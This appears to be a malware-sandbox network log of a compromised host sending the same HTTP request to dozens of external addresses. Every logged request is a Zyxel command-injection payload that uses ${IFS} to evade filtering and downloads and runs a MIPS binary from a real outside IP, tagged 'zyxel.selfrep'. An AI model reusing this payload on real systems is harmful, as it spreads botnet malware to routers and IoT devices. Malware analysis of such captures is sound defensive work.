                                        Jan 14, 2024 16:18:51.609276056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6020192.168.2.1355064172.0.78.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609311104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6021192.168.2.1352826150.72.160.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609360933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6022192.168.2.1358732138.52.248.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609391928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6023192.168.2.1353348152.248.45.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609441042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6024192.168.2.1337656114.5.52.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609468937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6025192.168.2.1348430199.148.165.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609494925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6026192.168.2.133758878.17.110.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609553099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6027192.168.2.133568824.229.141.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609594107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6028192.168.2.135850620.147.109.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609626055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6029192.168.2.1353880131.87.184.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609649897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6030192.168.2.1355388185.46.240.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609707117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6031192.168.2.1357716149.91.93.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609756947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6032192.168.2.135790880.125.14.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609788895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6033192.168.2.133359492.71.84.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609834909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6034192.168.2.133797848.229.131.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609899998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6035192.168.2.1345730162.160.223.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609935045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6036192.168.2.1346432130.218.35.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609968901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6037192.168.2.135925698.151.75.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609992027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6038192.168.2.135721642.15.245.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610028028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6039192.168.2.1340624151.53.164.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610064983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6040192.168.2.1350750163.105.132.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610112906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6041192.168.2.1342146212.200.117.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610157967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6042192.168.2.1339404190.96.214.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610213041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6043192.168.2.1338950152.192.167.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610244036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6044192.168.2.133528084.129.40.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610311031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6045192.168.2.1354322131.147.146.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610358953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6046192.168.2.135319047.222.253.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610398054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6047192.168.2.134140683.136.237.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610445976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6048192.168.2.1354548129.181.157.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610496998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6049192.168.2.1342042121.149.24.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610528946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6050192.168.2.134238212.119.12.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610586882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6051192.168.2.1347386171.248.169.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610622883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6052192.168.2.1343122166.98.104.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610670090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6053192.168.2.1357420116.158.26.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610704899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6054192.168.2.1351632142.199.200.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610724926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6055192.168.2.134373464.24.163.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610778093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6056192.168.2.135321469.10.76.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610810995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6057192.168.2.1335952168.184.233.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610850096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6058192.168.2.134982264.25.56.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610891104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6059192.168.2.1355526223.212.196.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610946894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6060192.168.2.134327072.192.133.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.610981941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6061192.168.2.1356914168.231.105.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611047029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6062192.168.2.1354280199.81.113.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611064911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6063192.168.2.1337630213.165.29.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611073971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6064192.168.2.133697071.11.189.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611109972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6065192.168.2.1359984106.114.123.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611145973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6066192.168.2.1356810139.179.38.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611183882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6067192.168.2.1345934140.10.70.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611206055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6068192.168.2.13561022.215.111.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611217022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6069192.168.2.135261064.22.217.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611277103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6070192.168.2.13371341.128.181.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611336946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6071192.168.2.1348938109.198.59.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611387014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6072192.168.2.1350644222.38.176.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611440897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6073192.168.2.134118672.138.31.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611442089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6074192.168.2.135359613.47.160.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611470938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6075192.168.2.135219458.46.140.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611534119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6076192.168.2.1360286174.107.24.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611562967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6077192.168.2.1341702178.8.131.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611599922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6078192.168.2.134462070.135.2.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611675978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6079192.168.2.13345364.239.235.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611695051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6080192.168.2.135799661.27.159.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611726046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6081192.168.2.1358058118.19.60.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.611756086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6082192.168.2.134883434.199.123.35443
                                        TimestampBytes transferredDirectionData
